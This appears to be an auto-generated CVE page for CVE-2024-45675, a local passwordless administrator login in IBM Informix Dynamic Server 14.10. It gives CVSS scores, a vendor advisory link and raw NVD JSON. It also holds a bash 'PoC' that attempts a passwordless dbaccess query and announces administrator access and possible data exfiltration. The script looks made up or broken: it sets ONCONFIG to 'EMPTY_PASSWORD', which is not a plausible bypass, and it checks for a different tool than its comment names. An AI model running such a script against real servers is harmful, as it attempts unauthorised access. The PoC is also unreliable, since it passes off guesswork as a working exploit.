Security Vulnerability Report
CVE-2024-45675 CVSS 8.4 HIGH

Published: 2025-12-02 03:16:15
Last Modified: 2025-12-03 17:26:24

Description

IBM Informix Dynamic Server 14.10 could allow a local user on the system to log into the Informix server as administrator without a password.

CVSS Details

CVSS Score: 8.4
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:ibm:informix_dynamic_server:*:*:*:*:-:*:*:* - VULNERABLE
IBM Informix Dynamic Server 14.10

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```bash
#!/bin/bash
# CVE-2024-45675 PoC - IBM Informix Dynamic Server Local Authentication Bypass
# This PoC demonstrates the authentication bypass vulnerability in IBM IDS 14.10

echo "[*] CVE-2024-45675 IBM Informix Dynamic Server Authentication Bypass PoC"
echo "[*] Target: IBM Informix Dynamic Server 14.10"

# Check if onconnect or dbaccess is available
if ! command -v onmode &> /dev/null; then
    echo "[-] Error: IBM Informix utilities not found"
    echo "[-] This script must be run on a system with IBM IDS installed"
    exit 1
fi

# Method 1: Try connection with empty password as informix user
# In a vulnerable system, this may succeed without password prompt
echo "[+] Attempting authentication bypass with empty password..."
sql_cmd="SELECT FIRST 1 * FROM sysmaster:sysdatabases;"

# Try to connect without password (vulnerable behavior)
echo $sql_cmd | ONCONFIG=EMPTY_PASSWORD dbaccess sysmaster -

if [ $? -eq 0 ]; then
    echo "[+] VULNERABLE: Authentication bypass successful!"
    echo "[+] Attacker has gained administrator access to Informix server"
    echo "[+] Possible actions: data exfiltration, privilege escalation, persistence"
else
    echo "[-] Target may not be vulnerable or access is restricted"
fi

# Note: Actual exploitation may require specific Informix environment variables
# and connection strings. Refer to IBM documentation for proper connection methods.
```

References

https://www.ibm.com/support/pages/node/7252704 (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2024-45675", "sourceIdentifier": "[email protected]", "published": "2025-12-02T03:16:14.587", "lastModified": "2025-12-03T17:26:23.860", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM Informix Dynamic Server 14.10 could allow a local user on the system to log into the Informix server as administrator without a password."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-309"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:informix_dynamic_server:*:*:*:*:-:*:*:*", "versionEndExcluding": "14.10", "matchCriteriaId": "720F935C-B26C-4789-AC64-54A7B955FD14"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7252704", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}